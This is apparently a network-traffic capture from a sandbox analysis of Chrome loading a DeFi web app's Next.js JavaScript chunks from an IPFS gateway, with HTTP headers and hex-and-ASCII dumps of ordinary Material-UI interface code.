                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreifu52qghnckfzybtczmj4dbeqgm674vvkb63ifoowcjsmeuv6ckqq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028478
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 33 35 39 36 30 34 32 63 34 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e423596042c4-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 34 32 30 5d 2c 7b 38 37 30 35 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 79 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 36 33 33 36 36 29 2c 6f 3d 72 28 38 37 34 36 32 29 2c 61 3d 72 28 36 37 32 39 34 29 2c 69 3d 72 28 38 36 30 31 30 29 2c 73 3d 72 28 39 34 37 38 30 29 2c 6c 3d 72 28 34 31 37 39 36 29 2c 63 3d 72 28 38 33 31 38 37 29 2c 75 3d 72 28 33 36 36 32 32 29 2c 64 3d 72 28 37 38 38 38 34 29 2c 70 3d 72 28 38 31 37 31 39 29 2c 62 3d 72 28 33 34 38 36 37 29
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8420],{87054:function(e,t,r){r.d(t,{Z:function(){return y}});var n=r(63366),o=r(87462),a=r(67294),i=r(86010),s=r(94780),l=r(41796),c=r(83187),u=r(36622),d=r(78884),p=r(81719),b=r(34867)
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 3a 68 6f 76 65 72 22 3a 7b 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 3a 22 6e 6f 6e 65 22 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 65 2e 76 61 72 73 3f 60 72 67 62 61 28 24 7b 65 2e 76 61 72 73 2e 70 61 6c 65 74 74 65 2e 74 65 78 74 2e 70 72 69 6d 61 72 79 43 68 61 6e 6e 65 6c 7d 20 2f 20 24 7b 65 2e 76 61 72 73 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 68 6f 76 65 72 4f 70 61 63 69 74 79 7d 29 60 3a 28 30 2c 6c 2e 46 71 29 28 65 2e 70 61 6c 65 74 74 65 2e 74 65 78 74 2e 70 72 69 6d 61 72 79 2c 65 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 68 6f 76 65 72 4f 70 61 63 69 74 79 29 2c 22 40 6d 65 64 69 61 20 28 68 6f 76 65 72 3a 20 6e 6f 6e 65 29 22 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 74 72 61 6e 73 70 61 72 65 6e 74
                                                                                                                                                                                                                                                  Data Ascii: :hover":{textDecoration:"none",backgroundColor:e.vars?`rgba(${e.vars.palette.text.primaryChannel} / ${e.vars.palette.action.hoverOpacity})`:(0,l.Fq)(e.palette.text.primary,e.palette.action.hoverOpacity),"@media (hover: none)":{backgroundColor:"transparent
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 74 68 22 2c 60 73 69 7a 65 24 7b 28 30 2c 75 2e 5a 29 28 61 29 7d 60 2c 69 5d 7d 3b 72 65 74 75 72 6e 28 30 2c 73 2e 5a 29 28 6c 2c 68 2c 74 29 7d 29 28 43 29 3b 72 65 74 75 72 6e 28 30 2c 66 2e 6a 73 78 29 28 6d 2c 28 30 2c 6f 2e 5a 29 28 7b 63 6c 61 73 73 4e 61 6d 65 3a 28 30 2c 69 2e 64 65 66 61 75 6c 74 29 28 45 2e 72 6f 6f 74 2c 6c 29 2c 64 69 73 61 62 6c 65 64 3a 70 2c 66 6f 63 75 73 52 69 70 70 6c 65 3a 21 62 2c 72 65 66 3a 74 2c 6f 6e 43 6c 69 63 6b 3a 65 3d 3e 7b 67 26 26 28 67 28 65 2c 77 29 2c 65 2e 64 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 29 7c 7c 79 26 26 79 28 65 2c 77 29 7d 2c 6f 6e 43 68 61 6e 67 65 3a 79 2c 76 61 6c 75 65 3a 77 2c 6f 77 6e 65 72 53 74 61 74 65 3a 43 2c 22 61 72 69 61 2d 70 72 65 73 73 65 64 22 3a 6a 7d 2c 41 2c 7b
                                                                                                                                                                                                                                                  Data Ascii: th",`size${(0,u.Z)(a)}`,i]};return(0,s.Z)(l,h,t)})(C);return(0,f.jsx)(m,(0,o.Z)({className:(0,i.default)(E.root,l),disabled:p,focusRipple:!b,ref:t,onClick:e=>{g&&(g(e,w),e.defaultPrevented)||y&&y(e,w)},onChange:y,value:w,ownerState:C,"aria-pressed":j},A,{
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 69 6f 6e 3f 7b 22 26 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 29 22 3a 7b 6d 61 72 67 69 6e 4c 65 66 74 3a 2d 31 2c 62 6f 72 64 65 72 4c 65 66 74 3a 22 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 62 6f 72 64 65 72 54 6f 70 4c 65 66 74 52 61 64 69 75 73 3a 30 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 4c 65 66 74 52 61 64 69 75 73 3a 30 7d 2c 22 26 3a 6e 6f 74 28 3a 6c 61 73 74 2d 6f 66 2d 74 79 70 65 29 22 3a 7b 62 6f 72 64 65 72 54 6f 70 52 69 67 68 74 52 61 64 69 75 73 3a 30 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 52 69 67 68 74 52 61 64 69 75 73 3a 30 7d 2c 5b 60 26 2e 24 7b 68 2e 73 65 6c 65 63 74 65 64 7d 20 2b 20 2e 24 7b 68 2e 67 72 6f 75 70 65 64 7d 2e 24 7b 68 2e 73 65 6c 65 63 74 65 64 7d 60 5d 3a 7b 62 6f 72
                                                                                                                                                                                                                                                  Data Ascii: ion?{"&:not(:first-of-type)":{marginLeft:-1,borderLeft:"1px solid transparent",borderTopLeftRadius:0,borderBottomLeftRadius:0},"&:not(:last-of-type)":{borderTopRightRadius:0,borderBottomRightRadius:0},[`&.${h.selected} + .${h.grouped}.${h.selected}`]:{bor
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 6d 65 6e 74 28 65 29 3f 61 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 65 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 28 30 2c 69 2e 64 65 66 61 75 6c 74 29 28 54 2e 67 72 6f 75 70 65 64 2c 65 2e 70 72 6f 70 73 2e 63 6c 61 73 73 4e 61 6d 65 29 2c 6f 6e 43 68 61 6e 67 65 3a 79 3f 42 3a 6b 2c 73 65 6c 65 63 74 65 64 3a 76 6f 69 64 20 30 3d 3d 3d 65 2e 70 72 6f 70 73 2e 73 65 6c 65 63 74 65 64 3f 64 28 65 2e 70 72 6f 70 73 2e 76 61 6c 75 65 2c 41 29 3a 65 2e 70 72 6f 70 73 2e 73 65 6c 65 63 74 65 64 2c 73 69 7a 65 3a 65 2e 70 72 6f 70 73 2e 73 69 7a 65 7c 7c 77 2c 66 75 6c 6c 57 69 64 74 68 3a 67 2c 63 6f 6c 6f 72 3a 65 2e 70 72 6f 70 73 2e 63 6f 6c 6f 72 7c 7c 68 2c 64 69 73 61 62 6c 65 64 3a 65 2e 70 72 6f 70 73 2e 64 69 73 61 62 6c 65 64 7c 7c 6d 7d 29 3a 6e 75 6c
                                                                                                                                                                                                                                                  Data Ascii: ment(e)?a.cloneElement(e,{className:(0,i.default)(T.grouped,e.props.className),onChange:y?B:k,selected:void 0===e.props.selected?d(e.props.value,A):e.props.selected,size:e.props.size||w,fullWidth:g,color:e.props.color||h,disabled:e.props.disabled||m}):nul
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 29 2e 74 6f 46 69 78 65 64 28 32 29 29 3b 72 65 74 75 72 6e 28 30 2c 75 2e 6a 73 78 29 28 69 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 63 65 6e 74 65 72 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 67 3f 28 30 2c 75 2e 6a 73 78 29 28 63 2e 42 2c 62 28 7b 63 6f 6d 70 61 63 74 3a 21 30 2c 70 65 72 63 65 6e 74 3a 21 30 2c 76 61 6c 75 65 3a 6d 2c 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 3a 32 2c 76 61 72 69 61 6e 74 3a 6e 75 6c 6c 21 3d 3d 6e 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 22 68 33 22 2c 22 64 61 74 61 2d 63 79 22 3a 22 61 70 79 22 7d 2c 68 29 29 3a 28 30 2c 75 2e 6a 73 78 73 29 28 75 2e 46 72 61 67 6d 65 6e 74 2c 7b
                                                                                                                                                                                                                                                  Data Ascii: ).toFixed(2));return(0,u.jsx)(i.Z,{sx:{display:"flex",alignItems:"center",justifyContent:"center"},children:g?(0,u.jsx)(c.B,b({compact:!0,percent:!0,value:m,visibleDecimals:2,variant:null!==n&&void 0!==n?n:"h3","data-cy":"apy"},h)):(0,u.jsxs)(u.Fragment,{
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 2e 5a 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 74 68 65 6d 65 3b 72 65 74 75 72 6e 7b 62 6f 72 64 65 72 3a 22 30 70 78 22 2c 66 6c 65 78 3a 31 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 23 33 38 33 44 35 31 22 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 22 2c 22 26 2e 4d 75 69 2d 73 65 6c 65 63 74 65 64 2c 20 26 2e 4d 75 69 2d 73 65 6c 65 63 74 65 64 3a 68 6f 76 65 72 22 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 23 46 46 46 46 46 46 22 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 22 7d 2c 22 26 2e 4d 75 69 2d 73 65 6c 65 63 74 65 64 2c 20 26 2e 4d 75 69 2d 64 69 73 61 62 6c 65 64 22 3a 7b 7a 49 6e 64 65 78 3a 31 30 30 2c 68 65 69 67 68 74 3a 22 31 30
                                                                                                                                                                                                                                                  Data Ascii: .Z)((function(e){var t=e.theme;return{border:"0px",flex:1,backgroundColor:"#383D51",borderRadius:"4px","&.Mui-selected, &.Mui-selected:hover":{backgroundColor:"#FFFFFF",borderRadius:"4px !important"},"&.Mui-selected, &.Mui-disabled":{zIndex:100,height:"10
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 6e 29 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 3b 74 25 32 3f 73 28 4f 62 6a 65 63 74 28 72 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 28 30 2c 6e 2e 5a 29 28 65 2c 74 2c 72 5b 74 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70
                                                                                                                                                                                                                                                  Data Ascii: .push.apply(r,n)}return r}function l(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?s(Object(r),!0).forEach((function(t){(0,n.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnProp
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 73 65 72 76 65 44 61 74 61 2c 52 3d 4e 75 6d 62 65 72 28 79 29 2c 53 3d 52 3e 3d 44 2e 67 68 6f 4d 69 6e 44 69 73 63 6f 75 6e 74 54 6f 6b 65 6e 42 61 6c 61 6e 63 65 46 6f 72 44 69 73 63 6f 75 6e 74 2c 50 3d 28 30 2c 78 2e 6a 73 78 29 28 78 2e 46 72 61 67 6d 65 6e 74 2c 7b 7d 29 2c 5a 3d 67 7c 7c 43 3b 72 65 74 75 72 6e 20 5a 26 26 28 50 3d 28 30 2c 78 2e 6a 73 78 29 28 61 2e 5a 2c 7b 73 78 3a 7b 70 79 3a 34 2c 70 78 3a 36 2c 66 6f 6e 74 53 69 7a 65 3a 22 31 32 70 78 22 2c 6c 69 6e 65 48 65 69 67 68 74 3a 22 31 36 70 78 22 2c 61 3a 7b 66 6f 6e 74 53 69 7a 65 3a 22 31 32 70 78 22 2c 6c 69 6e 65 48 65 69 67 68 74 3a 22 31 36 70 78 22 2c 66 6f 6e 74 57 65 69 67 68 74 3a 35 30 30 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 78 2e 6a 73 78 73 29 28 69 2e 5a 2c
                                                                                                                                                                                                                                                  Data Ascii: serveData,R=Number(y),S=R>=D.ghoMinDiscountTokenBalanceForDiscount,P=(0,x.jsx)(x.Fragment,{}),Z=g||C;return Z&&(P=(0,x.jsx)(a.Z,{sx:{py:4,px:6,fontSize:"12px",lineHeight:"16px",a:{fontSize:"12px",lineHeight:"16px",fontWeight:500}},children:(0,x.jsxs)(i.Z,


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  53192.168.2.549774209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC739OUTGET /_next/static/chunks/1506-405d1202a4254f54.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:44 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 8048
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreig4476ym6ry7jt6m5uunhf5xgztlz6g7zvub6ud5bzzovm4gobgru"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/1506-405d1202a4254f54.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreig4476ym6ry7jt6m5uunhf5xgztlz6g7zvub6ud5bzzovm4gobgru
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028478
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 33 35 64 39 61 37 63 39 66 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4235d9a7c9f-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1305INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 35 30 36 5d 2c 7b 36 34 32 38 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 6f 2e 64 28 74 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 79 7d 7d 29 3b 76 61 72 20 72 3d 6f 28 36 33 33 36 36 29 2c 61 3d 6f 28 38 37 34 36 32 29 2c 69 3d 6f 28 36 37 32 39 34 29 2c 6e 3d 6f 28 38 36 30 31 30 29 2c 73 3d 6f 28 32 38 33 32 30 29 2c 64 3d 6f 28 33 34 38 36 37 29 2c 6c 3d 6f 28 39 34 37 38 30 29 2c 63 3d 6f 28 32 39 36 32 38 29 2c 75 3d 6f 28 31 33 32 36 34 29 2c 70 3d 6f 28 36 36 35 30 30 29 2c 6d 3d 6f 28 38 35 38 39 33 29
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1506],{64288:function(e,t,o){o.d(t,{Z:function(){return y}});var r=o(63366),a=o(87462),i=o(67294),n=o(86010),s=o(28320),d=o(34867),l=o(94780),c=o(29628),u=o(13264),p=o(66500),m=o(85893)
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 64 74 68 26 26 7b 5b 65 2e 62 72 65 61 6b 70 6f 69 6e 74 73 2e 75 70 28 22 78 73 22 29 5d 3a 7b 6d 61 78 57 69 64 74 68 3a 4d 61 74 68 2e 6d 61 78 28 65 2e 62 72 65 61 6b 70 6f 69 6e 74 73 2e 76 61 6c 75 65 73 2e 78 73 2c 34 34 34 29 7d 7d 2c 74 2e 6d 61 78 57 69 64 74 68 26 26 22 78 73 22 21 3d 3d 74 2e 6d 61 78 57 69 64 74 68 26 26 7b 5b 65 2e 62 72 65 61 6b 70 6f 69 6e 74 73 2e 75 70 28 74 2e 6d 61 78 57 69 64 74 68 29 5d 3a 7b 6d 61 78 57 69 64 74 68 3a 60 24 7b 65 2e 62 72 65 61 6b 70 6f 69 6e 74 73 2e 76 61 6c 75 65 73 5b 74 2e 6d 61 78 57 69 64 74 68 5d 7d 24 7b 65 2e 62 72 65 61 6b 70 6f 69 6e 74 73 2e 75 6e 69 74 7d 60 7d 7d 29 29 29 2c 70 3d 69 2e 66 6f 72 77 61 72 64 52 65 66 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 63 6f 6e 73 74 20 69
                                                                                                                                                                                                                                                  Data Ascii: dth&&{[e.breakpoints.up("xs")]:{maxWidth:Math.max(e.breakpoints.values.xs,444)}},t.maxWidth&&"xs"!==t.maxWidth&&{[e.breakpoints.up(t.maxWidth)]:{maxWidth:`${e.breakpoints.values[t.maxWidth]}${e.breakpoints.unit}`}}))),p=i.forwardRef((function(e,t){const i
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 69 75 6d 22 2c 22 73 69 7a 65 4c 61 72 67 65 22 5d 29 2c 67 3d 6f 28 38 35 38 39 33 29 3b 63 6f 6e 73 74 20 62 3d 5b 22 63 68 69 6c 64 72 65 6e 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 2c 22 63 6f 6c 6f 72 22 2c 22 64 69 73 61 62 6c 65 64 22 2c 22 64 69 73 61 62 6c 65 46 6f 63 75 73 52 69 70 70 6c 65 22 2c 22 66 75 6c 6c 57 69 64 74 68 22 2c 22 6f 6e 43 68 61 6e 67 65 22 2c 22 6f 6e 43 6c 69 63 6b 22 2c 22 73 65 6c 65 63 74 65 64 22 2c 22 73 69 7a 65 22 2c 22 76 61 6c 75 65 22 5d 2c 76 3d 28 30 2c 70 2e 5a 50 29 28 6c 2e 5a 2c 7b 6e 61 6d 65 3a 22 4d 75 69 54 6f 67 67 6c 65 42 75 74 74 6f 6e 22 2c 73 6c 6f 74 3a 22 52 6f 6f 74 22 2c 6f 76 65 72 72 69 64 65 73 52 65 73 6f 6c 76 65 72 3a 28 65 2c 74 29 3d 3e 7b 63 6f 6e 73 74 7b 6f 77 6e 65 72 53 74 61 74 65
                                                                                                                                                                                                                                                  Data Ascii: ium","sizeLarge"]),g=o(85893);const b=["children","className","color","disabled","disableFocusRipple","fullWidth","onChange","onClick","selected","size","value"],v=(0,p.ZP)(l.Z,{name:"MuiToggleButton",slot:"Root",overridesResolver:(e,t)=>{const{ownerState
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 65 2e 76 61 72 73 3f 60 72 67 62 61 28 24 7b 6f 7d 20 2f 20 63 61 6c 63 28 24 7b 65 2e 76 61 72 73 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 73 65 6c 65 63 74 65 64 4f 70 61 63 69 74 79 7d 20 2b 20 24 7b 65 2e 76 61 72 73 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 68 6f 76 65 72 4f 70 61 63 69 74 79 7d 29 29 60 3a 28 30 2c 64 2e 46 71 29 28 72 2c 65 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 73 65 6c 65 63 74 65 64 4f 70 61 63 69 74 79 2b 65 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 68 6f 76 65 72 4f 70 61 63 69 74 79 29 2c 22 40 6d 65 64 69 61 20 28 68 6f 76 65 72 3a 20 6e 6f 6e 65 29 22 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 65 2e 76 61 72 73 3f 60 72 67 62 61 28 24 7b 6f 7d 20
                                                                                                                                                                                                                                                  Data Ascii: kgroundColor:e.vars?`rgba(${o} / calc(${e.vars.palette.action.selectedOpacity} + ${e.vars.palette.action.hoverOpacity}))`:(0,d.Fq)(r,e.palette.action.selectedOpacity+e.palette.action.hoverOpacity),"@media (hover: none)":{backgroundColor:e.vars?`rgba(${o}
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 32 32 29 3b 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 74 26 26 76 6f 69 64 20 30 21 3d 3d 65 26 26 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 3f 74 2e 69 6e 64 65 78 4f 66 28 65 29 3e 3d 30 3a 65 3d 3d 3d 74 29 7d 76 61 72 20 70 3d 6f 28 33 34 38 36 37 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 70 2e 5a 29 28 22 4d 75 69 54 6f 67 67 6c 65 42 75 74 74 6f 6e 47 72 6f 75 70 22 2c 65 29 7d 76 61 72 20 68 3d 28 30 2c 6f 28 31 35 38 38 29 2e 5a 29 28 22 4d 75 69 54 6f 67 67 6c 65 42 75 74 74 6f 6e 47 72 6f 75 70 22 2c 5b 22 72 6f 6f 74 22 2c 22 73 65 6c 65 63 74 65 64 22 2c 22 76 65 72 74 69 63 61 6c 22 2c 22 64 69 73 61 62 6c 65 64 22 2c 22 67 72 6f 75 70 65 64 22 2c
                                                                                                                                                                                                                                                  Data Ascii: 22);function u(e,t){return void 0!==t&&void 0!==e&&(Array.isArray(t)?t.indexOf(e)>=0:e===t)}var p=o(34867);function m(e){return(0,p.Z)("MuiToggleButtonGroup",e)}var h=(0,o(1588).Z)("MuiToggleButtonGroup",["root","selected","vertical","disabled","grouped",
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1267INData Raw: 64 65 72 42 6f 74 74 6f 6d 4c 65 66 74 52 61 64 69 75 73 3a 30 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 52 69 67 68 74 52 61 64 69 75 73 3a 30 7d 2c 5b 60 26 2e 24 7b 68 2e 73 65 6c 65 63 74 65 64 7d 20 2b 20 2e 24 7b 68 2e 67 72 6f 75 70 65 64 7d 2e 24 7b 68 2e 73 65 6c 65 63 74 65 64 7d 60 5d 3a 7b 62 6f 72 64 65 72 54 6f 70 3a 30 2c 6d 61 72 67 69 6e 54 6f 70 3a 30 7d 7d 29 7d 29 29 29 3b 76 61 72 20 76 3d 69 2e 66 6f 72 77 61 72 64 52 65 66 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6f 3d 28 30 2c 6c 2e 5a 29 28 7b 70 72 6f 70 73 3a 65 2c 6e 61 6d 65 3a 22 4d 75 69 54 6f 67 67 6c 65 42 75 74 74 6f 6e 47 72 6f 75 70 22 7d 29 2c 7b 63 68 69 6c 64 72 65 6e 3a 64 2c 63 6c 61 73 73 4e 61 6d 65 3a 70 2c 63 6f 6c 6f 72 3a 68 3d 22 73 74
